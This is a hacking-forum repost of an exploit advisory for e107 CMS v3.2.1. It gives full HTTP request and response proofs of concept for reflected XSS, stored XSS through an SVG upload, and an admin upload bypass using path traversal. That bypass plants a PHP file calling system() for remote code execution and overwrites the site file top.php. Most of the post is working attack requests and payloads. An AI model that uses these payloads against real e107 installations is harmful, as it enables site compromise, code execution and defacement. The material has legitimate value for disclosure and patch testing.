Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

e107 CMS v3.2.1 - Multiple Vulnerabilities

 Share


HACK1949

Recommended Posts

# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - Via adding comment (Authenticated)

# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1'  >
[...]

User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field

image.png


### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.

Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)
image->media manager->upload a file->Image/File URL
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select  '  data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg'  data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]

image.png


### Upload restriction bypass (Authenticated [Admin])+RCE

Upload and execute .PHP file
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.

image.png


Media Manager-> Media Upload/Import -> From a remote location

# POC

Request
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]

We can see uploaded PHP file on the server side.

image.png


cmd.php file source:

<?php
system('whoami');
?>

image.png


### Upload restriction bypass (Authenticated [Admin])+ Server file override

Attacker can override example top.php file in the main directory of web application.
Original file top.php in server:
image.png


We can override file via following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]

top.php file content was tampered:
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...